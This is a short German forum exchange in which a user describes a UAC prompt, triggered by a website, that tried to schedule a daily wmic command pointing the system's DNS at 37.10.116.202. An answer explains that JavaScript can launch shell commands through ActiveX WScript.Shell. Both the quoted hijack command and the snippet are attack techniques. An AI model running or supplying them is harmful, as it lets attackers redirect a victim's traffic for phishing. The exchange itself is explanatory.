Vor einiger Zeit wurde beim Aufrufen einer Website in Opera 12.12 die folgende Windows 7 UAC-Eingabeaufforderung auf dem Bildschirm angezeigt:
C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8") Ich habe es natürlich abgelehnt.
Die Methode, mit der Phisher versucht haben, meine Daten abzurufen, ist ziemlich klar, aber wie ist es ihnen gelungen, den Befehl vom Browser aus auszuführen?
Phisher können Javascript wie folgt verwenden:
var wsh = new ActiveXObject('WScript.Shell'); command = 'cmd /k ' + 'what ever ...'; wsh.Run(command); Es funktioniert nur, wenn Sie die Sicherheitsfunktionen in Ihrem Browser deaktivieren, die ActiveX verwenden müssen.